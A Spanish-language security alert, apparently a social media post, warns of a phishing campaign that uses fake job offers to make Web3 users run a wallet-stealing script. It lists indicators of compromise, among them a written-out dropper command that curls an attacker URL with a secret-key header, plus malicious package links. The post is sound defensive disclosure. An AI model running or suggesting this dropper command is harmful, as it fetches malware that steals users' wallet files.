🚨 Alerta de Seguridad TI 🚨

Según el socio de la comunidad @1nf0s3cpt, una campaña activa de phishing está dirigidendo a usuarios de Web3 con ofertas de trabajo falsas (por ejemplo, $120/hora) para engañarlos y hacer que ejecuten un script malicioso que roba archivos de billetera.

🔍 IOCs clave:

🔸Repositorio de GitLab: https://t.co/ivGN93PS4b

🔸Dropper: curl https://t.co/fwRuktoVd9 -H "x-secret-key: _"

🧪 El método de ataque es muy similar al uso previo de Lazarus de paquetes NPM para difundir código malicioso:

https://t.co/bBC4i2vYpA

🚨 Encontramos que un nuevo paquete NPM malicioso acaba de ser publicado:

https://t.co/SjgmO1FOIL

🔸Probablemente vinculado a GitHub: apollo-hero

🔸Correo del cargador: skelstar125@gmail.com

⚠️ NO instales ni ejecutes paquetes o scripts desconocidos. Siempre verifica las fuentes.

#LAZARUS #Phishing